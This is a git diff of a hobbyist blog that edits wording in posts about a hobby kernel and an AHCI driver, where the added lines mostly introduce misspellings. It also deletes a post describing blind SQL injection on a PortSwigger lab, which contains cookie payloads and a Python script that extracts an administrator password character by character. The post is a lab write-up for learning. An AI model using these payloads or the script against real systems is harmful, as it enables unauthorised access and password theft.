3 changed files with 17 additions and 243 deletions
--- a/content/blog/2023/12/acadia-0.1.0/index.md
+++ b/content/blog/2023/12/acadia-0.1.0/index.md
@ -111,14 +111,13 @@ On top of the things mentioned above, we use the limine protocol to:
 Following boot we immediately initialize the global descriptor table (GDT) and
 interrupt descriptor table (IDT). The **GDT** is mostly irrelevant for x86-64,
 however it was interesting trying to get it to work with the sysret function
-which expects two copies of the user-space segment descriptors to allow
+which expects two copies of the user-space segment descriptors to allow returing
-returning to 32bit code from a 64 bit OS. Right now the system doesn't support
+to 32bit code from a 64 bit OS. Right now the system doesn't support 32 bit code
-32 bit code (and likely never will) so we just duplicate the 64 bit code
+(and likely never will) so we just duplicate the 64 bit code segment.
 segment.
 The **IDT** is fairly straightforward and barebones for now. I slowly add more
 debugging information to faults as I run into them and it is useful. One of the
-biggest improvements was setting up a separate kernel stack for Page Faults and
+biggest improvements was setting up a seperate kernel stack for Page Faults and
 General Protection Faults. That way if I broke memory related to the current
 stack frame I get useful debugging information rather than an immediate triple
 fault. I also recently added some very sloppy stack unwind code so I can more
@ -154,9 +153,9 @@ earlier than they need to be it is obvious because things break.
 For **virtual memory management** I keep the higher half (kernel) mappings
 identical in each address space. Most of the kernel mappings are already
-available from the bootloader but some are added for heaps and additional stacks.
+availble from the bootloader but some are added for heaps and additional stacks.
 For user memory we maintain a tree of the mapped in objects to ensure that none
-intersect. Right now the tree is inefficient because it doesn't self balance
+intersect. Right now the tree is innefficient because it doesn't self balance
 and most objects are inserted in ascending order (i.e. it is essentially a
 linked list).
@ -214,7 +213,7 @@ The kernel provides APIs to:
 * Allocate memory and map it into an address space.
 * Communicate with other processes using Endpoints, Ports, and Channels.
 * Register IRQ handlers.
-* Manage Capabilities.
+* Manage Capabilites.
 * Print debug information to the VM output.
 ### IPC
--- a/content/blog/2024/01/ahci-driver/index.md
+++ b/content/blog/2024/01/ahci-driver/index.md
@ -110,7 +110,7 @@ The short story is that we are looking for the device with the right [class
 code](https://wiki.osdev.org/PCI#Class_Codes) - Class Code 0x1 (Storage Device),
 Subclass 0x6 (SATA Controller), Subtype 0x1 (AHCI).
-Once we have the correct configuration space we can read the address at offset
+Once we have the correct configuration space we cn read the address at offset
 0x24 (called the ABAR for AHCI Base Address) which points to the start of the
 GHC registers.
@ -319,7 +319,7 @@ type and any errors from the interrupt since we aren't sending any commands.
 Something I'm not sure about is that as soon as we enable interrupts we seem to
 receive a FIS from the device with an error bit set. Both the hard drive and the
-optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
+optical drive on qemu send a FIS with error bit 0x1 set. Additionally the status
 field is set to 0x30 for the hard drive and 0x70 for the optical drive. 
 I was able to find a [OSDev Forum
@ -328,7 +328,7 @@ referencing that this behavior is caused by the reset sending an EXECUTE DEVICE
 DIAGNOSTIC command (0x90) to the device. It notes that this is largely
 undocumented behavior but at least this information offers some clarity on the
 outputs. Reading the ATA Command Set section 7.9.4 we can see that the command
-outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
+ouputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
 present`. According a footnote we can "See the appropriate transport standard
 for the definition of device 0 and device 1." I really thought I was already
 looking at the "appropriate transport standard" but alas. All that to say we'll
@ -340,7 +340,7 @@ Now that the AHCI ports are initialized and can handle an interrupt, we can send
 commands to them. To start with lets send the IDENTIFY DEVICE command to each
 device. This command asks the device to send 512 bytes of information about
 itself back to us. These bytes contain 40 years of certified-crufty backwards
-compatibility. I mean just feast your eyes on the number of retired and obsolete
+compatability. I mean just feast your eyes on the number of retired and obsolete
 fields in just the first page of the spec.
 ![IDENTIFY DEVICE Response](images/IDENTIFY_DEVICE.png)
@ -350,7 +350,7 @@ and sector count from the drive. To do so we need to figure out how to send a
 command to the device. To be honest I feel like the specs fall down here in
 actually explaining this. The trick is to send a Register Host to Device FIS in one
 of the command slots. This FIS type has a field for the command as well as some
-common parameters such as LBA and count. In retrospect it is fairly clear once
+common parameters such as lba and count. In retrospect it is fairly clear once
 you are aware of it, but if you are just reading the SATA spec and looking at
 the possible commands, making the logical jump to the Register Host To Device
 FIS feels damn near impossible.
@ -379,7 +379,7 @@ Device FIS is as follows:
 ![Register Host to Device FIS Layout](images/RegisterHostToDeviceFIS.png)    
 We don't need to initialize most of the fields here because the IDENTIFY_DEVICE
-call doesn't rely on an LBA or sector count. One of the keys is setting the high
+call doesn't rely on an lba or sector count. One of the keys is setting the high
 bit "C" in the byte that contains PM Port which indicates to the HBA that this
 FIS contains a new command (I spent a while trying to figure out why this wasn't
 working without that). The code for this is relatively straightforward.
@ -429,9 +429,9 @@ port_struct_->command_issue |= (1 << slot);
 ```
 But wait! How will we know when this command has completed? We somehow need to
-wait until we receive an interrupt for this command to process the data it
+wait until we receive an interrupt for this command to proccess the data it
 sent. To handle this we can add a semaphore for each port command slot to allow
-signalling when we receive a completion interrupt for that command. I think it
+signalling when we recieve a completion interrupt for that command. I think it
 might make sense to have some sort of callback instead so we can pass errors
 back to the caller instead of just a completion signal. However I'm not sure
 what type of errors exist that are resolvable by the caller so for now this
@ -469,7 +469,7 @@ void AhciPort::HandleIrq() {
 }
 ```
-OK now that we have retrieved the information from the drive we can parse it.
+Ok now that we have retrieved the information from the drive we can parse it.
 For the sector size, the default is 512 bytes which we will use unless the
 `LOGICAL SECTOR SIZE SUPPORTED` bit is set in double word 106, bit 12. If that
 is set we can check the double words at 117 and 118 to get the 32 bit sector
@ -531,7 +531,7 @@ that truly only a mother could love:
 ![Register Host to Device Layout LBA](images/RegisterHostToDeviceFISLBA.png)
-That aside we simply update the FIS construction to set the command, LBA, and
+That asside we simply update the FIS construction to set the command, LBA, and
 sector count. Following that we set the PRDT values (although we still only use
 one slot).
--- a/content/blog/2024/01/blind-sqli-automation/index.md
+++ b/content/blog/2024/01/blind-sqli-automation/index.md
@ -1,225 +0,0 @@
 ---
 title: "Automating Blind SQL Injection on Cookies"
 date: 2024-01-23
 ---
 Earlier this evening, I was working through one of the [PortSwigger SQL
 injection
 labs](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)
 which requires you to determine an administrator password by injecting some SQL
 into a cookie and checking if the content of the page changes because a
 resulting query succeeded or failed.
 ## The attack
 Basically say you have a cookie `TrackingId` with a value like
 `nCoQWoq8E7c6vj1e` and the page runs a query like `SELECT ... FROM trackers
 WHERE id = 'nCoQWoq8E7c6vj1o'` and inserts a "Welcome Back" banner onto the page
 if the query succeeds and doesn't if it fails.
 This means you can get creative with the value of the cookie to do some SQL
 injection and use the boolean output (either the banner displays or it doesn't)
 to extract information.
 To validate that there is a SQL injection path available you can try the
 following two values for the cookie:
 ```markdown
 nCoQWoq8E7c6vj1o' AND '1'='1
 nCoQWoq8E7c6vj1o' AND '1'='0
 ```
 This transforms the query from something like this:
 ```sql
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o';
 ```
 Into your modified query:
 ```sql
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND '1'='0';
 ```
 Now this might not seem very useful off the bat but you can extract a lot of
 information out of the database this way. Consider the following query.
 ```sql
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND
  (SELECT password FROM users WHERE username = 'administrator') = 'hunter2';
 ```
 Now if the "Welcome Back" banner displayed on the site you would know that you
 had properly guessed the admin password because the condition evaluated to true.
 Now this isn't any more helpful than just trying to brute force the password on
 the login page (other than maybe just bypassing some rate-limits and monitoring).
 But what you can do to speed this up is to try to guess each letter at a time,
 and you can bifurcate while you're at it. Consider the following three queries
 (borrowed directly from the [PortSwigger
 tutorial](https://portswigger.net/web-security/sql-injection/blind)).
 ```sql
 -- This succeeds
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm';
 -- This fails
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't';
 -- This succeeds
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's';
 ```
 We now know the first letter of the administrator password is 's'!
 Looking directly at the cookie values they were as follows:
 ```markdown
 nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm
 nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't
 nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
 ```
 This is a pretty nifty attack that lets us systematically derive the
 administrators password.
 ## The Problem
 Happily, I got to work on the lab and started bifurcating each letter of the
 administrator's password. The issue was by the time I got done doing this for 5
 letters in the password I was desperately hoping it was only 5 characters long.
 I had the same thoughts 8 characters, 10 characters, and 16 characters. This
 process was incredibly tedious and involved refreshing the page, updating the
 cookie info based on what I had just learned, saving the cookie, and refreshing
 the page again.
 Obviously there had to be a better way, but because I kept feeling like I was
 just around the corner from cracking it I ended up powering through all 20
 characters of the password. 20! This took me well over 30 minutes I think.
 Clearly, this sort of repetitive work is something that should be automated.
 ## The Solution
 So let's take a crack at this using the python requests library (mainly because
 it is the one I've used in the past). Let's start by simply getting the page as
 is:
 ```python
 import requests
 url = "https://{SOME_HEX_ID}.web-security-academy.net/"
 r = requests.get(url)
 print(r.status_code)
 print(r.text)
 ```
 And viola it works! At least we don't have to pretend we're a browser or
 something to get the page properly. Next up lets try to get the "Welcome Back!"
 banner.
 ```python
 cookies = {
    "TrackingId": "CjAZljYSS9X1ZfRg",
 }
 r = requests.get(url, cookies=cookies)
 ```
 Incredibly this also works on the first try! Now let's generalize this into a
 function that tells us whether a specific cookie gets a good response or not.
 ```python
 def injection_works(inject_str):
    url = "https://0a0400cc04bd096f82089e9e005900a9.web-security-academy.net/"
    cookies = {
        "TrackingId": f"CjAZljYSS9X1ZfRg{inject_str}",
    }
    r = requests.get(url, cookies=cookies)
    if r.status_code != 200:
        print(r.status_code)
        print(r.text)
        sys.exit("Request failed")
    return "Welcome back!" in r.text
 if __name__ == "__main__":
    print(injection_works(""))
 ```
 For the purposes of this we can just match the exact string in the response
 text, we don't need to actually parse it using beautiful soup or something.
 Now we can use this function to bisect the first character like so:
 ```python
 def determine_character(char_num):
    base_inj_str = "' AND SUBSTRING("
                   "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
    # There has got to be a cleaner way to do this right?
    base_charset = "0123456789abcdefghijklmnopqrstuvxyz"
    charset = base_charset[:]
    while len(charset) > 1:
        mid_char_num = int(len(charset) / 2)
        mid_char = charset[mid_char_num]
        inj_str = base_inj_str.format(char_num, mid_char)
        if injection_works(inj_str):
            # The character is less than our midpoint.
            charset = charset[:mid_char_num]
        else:
            # The character is greater than or equal to our midpoint.
            charset = charset[mid_char_num:]
        time.sleep(1)
        print(charset)
    return charset[0]
 if __name__ == "__main__":
    print(determine_character(1))
 ```
 This successfully identifies the first character in the administrator password as
 '1'.
 Finally we just need to do this iteratively until we reach the end of the
 password. While doing this manually I learned that when you take a substring
 outside of a strings length in MySQL it just returns an empty string. Lets add a
 case to detect that before trying to bifurcate a character, because as I
 learned annoyingly the first time around, the empty string will always compare
 as less than a single character. We can use that to our advantage however and
 simply test that whether the string is less than a character we know we won't
 see (as we know the password is lowercase alphanumeric) like the '!'.
 ```python
 def determine_character(char_num):
    base_inj_str = "' AND SUBSTRING("
                   "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
    base_charset = "0123456789abcdefghijklmnopqrstuvxyz"
    if injection_works(base_inj_str.format(char_num, '!')):
        return None
    ...
 ```
 Then in the main function we can use an [assignment
 expression](https://peps.python.org/pep-0572/) to loop until the function
 returns None.
 ```python
 if __name__ == "__main__":
    char_num = 1
    password = ""
    while char := determine_character(char_num):
        password += char
        char_num += 1
    print(password)
 ```
 And this worked on the first try! It got the password in around 3 minutes
 (mainly hampered by the slow response time of the server but I didn't want to
 hammer the kind people at PortSwagger by parallelizing this). And all told this
 took me just over 50 minutes to write (including this blog post though). And
 while that was slightly longer than the time it took me to do this manually it
 was wayyyy less tedious and it's repeatable!
 Overall, I found this very enjoyable as I have played with SQL injections in the
 past but I haven't tried to automate anything around it and this was a cool
 opportunity to do that.